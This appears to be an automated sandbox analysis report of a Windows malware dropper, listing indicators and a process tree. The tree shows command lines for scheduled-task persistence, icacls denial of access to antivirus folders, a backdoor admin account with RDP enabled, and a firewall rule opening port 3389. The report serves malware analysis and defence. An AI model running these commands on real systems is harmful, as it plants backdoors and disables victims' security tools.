File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\EnigmaSoft	update.exe
File opened for modification	C:\Program Files (x86)\GPU Temp	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\Loaris Trojan Remover	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\Ravantivirus	update.exe
File opened for modification	C:\Program Files (x86)\IObit	update.exe
File opened for modification	C:\Program Files (x86)\Transmission	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\Common Files\AV	update.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files\Process Hacker 2	update.exe
File opened for modification	C:\Program Files (x86)\Moo0	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files\SUPERAntiSpyware	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File opened for modification	C:\Program Files\Transmission	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files\HitmanPro	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

smss.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1568 schtasks.exe
3140 schtasks.exe
3164 schtasks.exe
2992 schtasks.exe
2928 schtasks.exe
1748 schtasks.exe
3156 schtasks.exe
424 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2052 timeout.exe

pid	process
1568	schtasks.exe
3140	schtasks.exe
3164	schtasks.exe
2992	schtasks.exe
2928	schtasks.exe
1748	schtasks.exe
3156	schtasks.exe
424	schtasks.exe

pid	process
2052	timeout.exe

Modifies registry class 3 IoCs

Processes:

smss.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 3 IoCs

Processes:

IP.exesmss.exe

description	ioc	process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exeupdate.exesmss.exe

pid	process
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
1804	Setup.exe
3708	update.exe
3708	update.exe
3708	update.exe
3708	update.exe
3708	update.exe
3708	update.exe
3708	update.exe
3708	update.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe
2732	smss.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Setup.exeunsecapp.exe

pid process

1804 Setup.exe
1944 unsecapp.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672

pid	process
672

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

winserv.exewinserv.exewinserv.exeRDPWinst.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3812	winserv.exe
Token: SeDebugPrivilege	1636	winserv.exe
Token: SeTakeOwnershipPrivilege	2860	winserv.exe
Token: SeTcbPrivilege	2860	winserv.exe
Token: SeTcbPrivilege	2860	winserv.exe
Token: SeDebugPrivilege	1372	RDPWinst.exe
Token: SeAuditPrivilege	3932	svchost.exe

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

KMS.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exewinserv.exewinserv.exeRDPWinst.exe

pid	process
1272	KMS.exe
3708	update.exe
3328	win.exe
3912	svchost.exe
2304	IP.exe
2732	smss.exe
3812	winserv.exe
3812	winserv.exe
3812	winserv.exe
3812	winserv.exe
3812	winserv.exe
2860	winserv.exe
2860	winserv.exe
2860	winserv.exe
2860	winserv.exe
1636	winserv.exe
1636	winserv.exe
1636	winserv.exe
1636	winserv.exe
1320	winserv.exe
1320	winserv.exe
1320	winserv.exe
1320	winserv.exe
1372	RDPWinst.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exeinstall.exeupdate.execmd.exesvchost.exesmss.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1804 wrote to memory of 4504	1804	Setup.exe	install.exe
PID 1804 wrote to memory of 4504	1804	Setup.exe	install.exe
PID 1804 wrote to memory of 4504	1804	Setup.exe	install.exe
PID 4504 wrote to memory of 1272	4504	install.exe	KMS.exe
PID 4504 wrote to memory of 1272	4504	install.exe	KMS.exe
PID 4504 wrote to memory of 3708	4504	install.exe	update.exe
PID 4504 wrote to memory of 3708	4504	install.exe	update.exe
PID 3708 wrote to memory of 1568	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 1568	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 3140	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 3140	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 3164	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 3164	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 2992	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 2992	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 2928	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 2928	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 3328	3708	update.exe	win.exe
PID 3708 wrote to memory of 3328	3708	update.exe	win.exe
PID 3708 wrote to memory of 3328	3708	update.exe	win.exe
PID 3708 wrote to memory of 1748	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 1748	3708	update.exe	schtasks.exe
PID 3708 wrote to memory of 2052	3708	update.exe	cmd.exe
PID 3708 wrote to memory of 2052	3708	update.exe	cmd.exe
PID 3708 wrote to memory of 4080	3708	update.exe	cmd.exe
PID 3708 wrote to memory of 4080	3708	update.exe	cmd.exe
PID 4080 wrote to memory of 2476	4080	cmd.exe	icacls.exe
PID 4080 wrote to memory of 2476	4080	cmd.exe	icacls.exe
PID 3708 wrote to memory of 3912	3708	update.exe	svchost.exe
PID 3708 wrote to memory of 3912	3708	update.exe	svchost.exe
PID 3708 wrote to memory of 3912	3708	update.exe	svchost.exe
PID 3912 wrote to memory of 2304	3912	svchost.exe	IP.exe
PID 3912 wrote to memory of 2304	3912	svchost.exe	IP.exe
PID 3912 wrote to memory of 2732	3912	svchost.exe	smss.exe
PID 3912 wrote to memory of 2732	3912	svchost.exe	smss.exe
PID 2732 wrote to memory of 3156	2732	smss.exe	schtasks.exe
PID 2732 wrote to memory of 3156	2732	smss.exe	schtasks.exe
PID 2732 wrote to memory of 424	2732	smss.exe	schtasks.exe
PID 2732 wrote to memory of 424	2732	smss.exe	schtasks.exe
PID 2732 wrote to memory of 3812	2732	smss.exe	winserv.exe
PID 2732 wrote to memory of 3812	2732	smss.exe	winserv.exe
PID 2732 wrote to memory of 3812	2732	smss.exe	winserv.exe
PID 2732 wrote to memory of 4768	2732	smss.exe	cmd.exe
PID 2732 wrote to memory of 4768	2732	smss.exe	cmd.exe
PID 4768 wrote to memory of 1508	4768	cmd.exe	net.exe
PID 4768 wrote to memory of 1508	4768	cmd.exe	net.exe
PID 1508 wrote to memory of 1316	1508	net.exe	net1.exe
PID 1508 wrote to memory of 1316	1508	net.exe	net1.exe
PID 2732 wrote to memory of 1552	2732	smss.exe	cmd.exe
PID 2732 wrote to memory of 1552	2732	smss.exe	cmd.exe
PID 1552 wrote to memory of 2436	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 2436	1552	cmd.exe	net.exe
PID 2436 wrote to memory of 560	2436	net.exe	Conhost.exe
PID 2436 wrote to memory of 560	2436	net.exe	Conhost.exe
PID 2732 wrote to memory of 3672	2732	smss.exe	cmd.exe
PID 2732 wrote to memory of 3672	2732	smss.exe	cmd.exe
PID 3672 wrote to memory of 1568	3672	cmd.exe	net.exe
PID 3672 wrote to memory of 1568	3672	cmd.exe	net.exe
PID 2732 wrote to memory of 4816	2732	smss.exe	cmd.exe
PID 2732 wrote to memory of 4816	2732	smss.exe	cmd.exe
PID 1568 wrote to memory of 4852	1568	net.exe	net1.exe
PID 1568 wrote to memory of 4852	1568	net.exe	net1.exe
PID 4816 wrote to memory of 4752	4816	cmd.exe	cmd.exe
PID 4816 wrote to memory of 4752	4816	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1804

C:\ProgramData\Setup\install.exe
C:\ProgramData\Setup\install.exe -palexpassword
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4504

C:\ProgramData\Setup\KMS.exe
"C:\ProgramData\Setup\KMS.exe"
3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1272

C:\ProgramData\Setup\update.exe
"C:\ProgramData\Setup\update.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CleanCash" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1568

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OfficeCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:3140

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckGlobal" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:3164

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:2992

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:2928

C:\ProgramData\Microsoft\win.exe
C:\ProgramData\Microsoft\win.exe -ppidar
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3328

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\DataBaseA\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\GB2x8f82s0LV6\DataBaseA.bat" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
4⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\system32\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2476

C:\ProgramData\Setup\svchost.exe
C:\ProgramData\Setup\svchost.exe -ppidar
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3912

C:\ProgramData\Setup\IP.exe
"C:\ProgramData\Setup\IP.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2304

C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
6⤵
- Drops file in Drivers directory
PID:3636

C:\ProgramData\Setup\smss.exe
"C:\ProgramData\Setup\smss.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
6⤵
- Creates scheduled task(s)
PID:3156

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
6⤵
- Creates scheduled task(s)
PID:424

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3812

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
6⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\system32\net.exe
net user John 12345 /add
7⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
8⤵
PID:1316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
6⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\system32\net.exe
net localgroup "Администраторы" John /add
7⤵
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
8⤵
PID:560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
6⤵
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
7⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
8⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
6⤵
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
7⤵
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
8⤵
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
6⤵
PID:1796

C:\Windows\system32\net.exe
net localgroup "Administrators" John /add
7⤵
PID:4952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
8⤵
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
6⤵
PID:4036

C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
7⤵
PID:1328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
8⤵
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
6⤵
PID:4468

C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
7⤵
PID:2364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
8⤵
PID:3328

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1372

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
7⤵
- Modifies Windows Firewall
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
6⤵
PID:4732

C:\Windows\system32\timeout.exe
timeout 5
7⤵
- Delays execution with timeout.exe
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3784

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
4⤵
PID:1528

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:560

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
5⤵
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4608

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
4⤵
PID:224

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
5⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4752

C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
4⤵
PID:3760

C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
4⤵
PID:640

C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
4⤵
PID:412

C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
4⤵
PID:992

C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
4⤵
PID:2184

C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
4⤵
PID:1332

C:\Windows\system32\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
4⤵
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
4⤵
PID:2780

C:\Windows\system32\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
5⤵
- Modifies file permissions
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
4⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
4⤵
PID:3824

C:\Windows\system32\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
5⤵
- Modifies file permissions
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
4⤵
PID:4072

C:\Windows\system32\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4356

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
4⤵
PID:1612

C:\Windows\system32\icacls.exe
icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
5⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
4⤵
PID:224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
4⤵
PID:1632

C:\Windows\system32\icacls.exe
icacls C:\FRST /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1636

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
4⤵
PID:760

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5112

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1732

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3640

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4240

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1700

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1096

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1068

C:\Windows\system32\cmd.exe
